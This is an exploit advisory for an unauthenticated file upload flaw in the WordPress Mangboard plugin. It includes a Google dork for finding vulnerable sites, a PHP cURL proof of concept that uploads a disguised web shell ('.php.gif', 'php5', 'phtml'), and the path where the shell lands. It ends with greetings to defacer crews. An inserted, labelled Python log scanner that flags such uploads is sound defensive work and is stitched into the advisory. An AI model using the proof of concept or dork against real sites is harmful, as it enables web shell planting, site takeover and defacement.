Wordpress Mangboard Plugins File Upload Vulnerability

# Exploit Title: Wordpress Mangboard Plugins File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/mangboard/
# Date: 16-04-2017
# Exploit Author: Isal Dot ID
# Vendor Homepage: https://srd.wordpress.org/plugins/mangboard/
# Version: webapps
# Tested on: Windows 7

1. Description
You can upload files without having access as an author.

2. Proof of Concept

<?php

// Change the extension to php5, phtml, php.fla, etc. as needed
$uploadfile = "yourfile.php.gif";
$ch = curl_init("http://127.0.0.1/wp-admin/admin-ajax.php?mode=basic&action=mb_uploader");
curl_setopt($ch, CURLOPT_POST, true);
// "@file" is the legacy cURL file-upload syntax of the PHP 5 era
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>


Or use an online CSRF tool: HERE
Fill in Postname with: Filedata

Shell path: /wp-content/uploads/mangboard/year/month/random number/random_yourshell.php.gif
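As an added defensive example (not part of the original advisory), the Python helper below flags access-log POSTs to the mb_uploader AJAX action named above, flags fetches of files under uploads/mangboard/ whose extension chain contains a PHP-executable segment (the .php.gif, php5 and phtml forms the PoC mentions), and exposes the filename check on its own for scanning the uploads directory. The log lines are constructed samples, and the 2017/04/123456 path is an assumed instance of the year/month/random-number layout stated above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Extension segments a permissive PHP handler (e.g. Apache AddHandler) executes,
# matched anywhere in the chain so "shell.php.gif" and "x.phtml.jpg" are flagged.
EXEC_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)(?:\.|$)", re.IGNORECASE)

# Combined Log Format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def is_executable_name(filename: str) -> bool:
    """True if any extension segment would be run as PHP by a permissive handler."""
    return bool(EXEC_EXT_RE.search(filename))

def is_mangboard_upload(line: str):
    """(ip, timestamp, status) for a POST to admin-ajax.php with action=mb_uploader, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    if m.group("method") != "POST" or not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    if parse_qs(parts.query).get("action") != ["mb_uploader"]:
        return None
    return m.group("ip"), m.group("ts"), int(m.group("status"))

def is_executable_fetch(line: str) -> bool:
    """True if the request path is under uploads/mangboard/ and its name looks executable."""
    m = LOG_RE.match(line)
    if not m:
        return False
    path = urlsplit(m.group("uri")).path
    return "/wp-content/uploads/mangboard/" in path and is_executable_name(path.rsplit("/", 1)[-1])

def scan(lines):
    """Collect mb_uploader POSTs and fetches of executable-looking files from uploads/mangboard."""
    uploads = [h for h in (is_mangboard_upload(l) for l in lines) if h]
    fetches = [l for l in lines if is_executable_fetch(l)]
    return uploads, fetches

# Constructed sample log lines (not from any real system); the 2017/04/123456 path is assumed.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Apr/2017:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?mode=basic&action=mb_uploader HTTP/1.1" 200 143 "-" "curl/7.52.1"',
    '198.51.100.7 - - [16/Apr/2017:10:01:05 +0000] "GET /wp-content/uploads/mangboard/2017/04/123456/abc_yourshell.php.gif HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [16/Apr/2017:10:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "Mozilla/5.0"',
]
```

Running scan(SAMPLE_LOG) yields one upload hit and one fetch hit; a request that carries action in the POST body instead of the query string will not be seen in the access log, so pair this with a walk of wp-content/uploads/mangboard/ that applies is_executable_name to each file.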

Greetz : Strlen - Jje Incovers - ReC0ded - Pak Haxor - Ice-cream - Panataran - ex-Sh1Ne - Malaikat_Galau - ViruzTomcat - AdrElite - Wonka - Sh0uT0u7 - l0c4lh34rtz - Zombie-Root - KONSLET

Thanks To : Sanjungan Jiwa Team - Indonesian Defacer Tersakiti - Jembut Loyality - IndoXploit - Suram Crew - Extreme Crew - Bahari Trouble Maker - Indonesian People
